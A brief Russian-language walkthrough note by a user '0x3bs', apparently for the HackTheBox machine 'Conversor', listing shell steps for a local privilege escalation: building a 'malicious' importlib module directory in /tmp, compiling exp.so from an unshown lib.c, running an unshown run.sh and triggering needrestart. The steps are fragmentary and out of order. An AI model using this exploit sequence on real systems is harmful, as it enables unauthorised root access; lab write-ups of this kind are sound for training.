
Я попробовал это в машине Conversor с HTB.
привет, это 0x3bs
На машине жертвы:
set -e
cd /tmp
# 1. Создайте структуру каталогов вредоносного модуля
mkdir -p malicious/importlib
на машине атакующего
для компиляции lib.c на машине атакующего:
gcc -shared -fPIC -o exp.so lib.c
и на машине жертвы:
в /tmp
chmod +x run.sh
в /tmp/malicious/importlib:
chmod +x exp.so
./exp.so
# попробуйте запустить после выполнения 'run.sh', если не сработало
и в /tmp
./run.sh
и в другом сеансе запустите needrestart
помните >> exp.so должен находиться в /tmp/malicious/importlib